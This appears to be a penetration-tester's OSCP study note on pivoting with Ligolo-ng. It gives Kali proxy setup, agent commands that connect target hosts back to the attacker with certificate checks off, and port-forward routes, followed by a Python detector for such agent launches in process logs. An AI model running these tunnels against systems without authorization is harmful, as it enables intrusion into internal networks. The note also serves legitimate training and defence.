Ligolo

Guide

Basic usage

From Kali:

  1. sudo ip tuntap add user pop mode tun ligolo
  2. sudo ip link set ligolo up
  3. sudo ip route add $targetIP.0/24 dev ligolo
  4. sudo ./proxy -selfcert

From Windows Target (agent file):

  1. .\ligolo.exe -connect $kaliIP:11601 -ignore-cert

OR

From Linux Target (agent file):

  1. ./ligolo -connect $kaliIP:11601 -ignore-cert

Then from Kali:

  1. session
  2. 1
  3. start
    1. listener_add --addr 0.0.0.0:5555 --to 127.0.0.1:6666
       This allows you to access port 5555 on the target from 127.0.0.1:6666 (Kali machine).

Local Port Forwarding:

  - ip route add 240.0.0.1/32 dev ligolo
  - 240.0.0.1 will point to whatever machine Ligolo-ng has an active tunnel on.
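On the defensive side, the agent commands in this guide (`-connect $kaliIP:11601 -ignore-cert`) leave a recognizable command line in process-creation logs on the target. The following is an added example, not part of the original guide or of Ligolo-ng, that flags that pattern; the log line layout, the sample lines and the function names are assumptions made for illustration.

```python
import re

# Flag names and port 11601 come from the agent commands in this guide.
# The log line layout below is an assumption made for this example.
CONNECT_RE = re.compile(r"(?:^|\s)-{1,2}connect[=\s]+(\S+):(\d{1,5})(?=\s|$)")
IGNORE_CERT_RE = re.compile(r"(?:^|\s)-{1,2}ignore-cert(?=\s|$)")
LINE_RE = re.compile(r'^(\S+) host=(\S+) cmdline="(.*)"$')
DEFAULT_PORT = 11601

# Constructed sample lines (documentation IP range), not real telemetry.
SAMPLE_LOG = [
    r'2024-01-01T10:00:01Z host=ws01 cmdline=".\ligolo.exe -connect 192.0.2.10:11601 -ignore-cert"',
    r'2024-01-01T10:00:05Z host=db01 cmdline="./a --connect=192.0.2.10:443 --ignore-cert"',
    r'2024-01-01T10:00:09Z host=ws02 cmdline="ssh -p 22 admin@192.0.2.20"',
    r'2024-01-01T10:00:12Z host=ws03 cmdline="tool -connect 192.0.2.30:8080"',
]

def score_cmdline(cmdline):
    """Return a finding dict if the command line resembles an agent launch, else None."""
    m = CONNECT_RE.search(cmdline)
    if not m:
        return None
    host, port = m.group(1), int(m.group(2))
    reasons = ["-connect host:port"]
    if IGNORE_CERT_RE.search(cmdline):
        reasons.append("-ignore-cert")
    if port == DEFAULT_PORT:
        reasons.append("default port 11601")
    # A bare -connect is too common on its own; require a second indicator.
    if len(reasons) < 2:
        return None
    return {"dest": f"{host}:{port}", "reasons": reasons}

def scan(lines):
    """Parse log lines and return one finding per matching process launch."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        hit = score_cmdline(m.group(3))
        if hit:
            findings.append({"time": m.group(1), "host": m.group(2), **hit})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The match keys on the flags rather than the binary name, so the renamed `./a` launch on a non-default port is still reported.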

Other tools

While the OSCP Lab discusses other tools such as socat, sshuttle, and plink, I found that Ligolo-ng was able to provide all of the same functionality and more simply. That said, I am linking a guide that discusses the other tools. Here is frankyyano’s Pivoting & Tunneling guide.

Tips

Port scanning through a tunnel can take a while, and it may be that only TCP scans work, so no UDP or ICMP.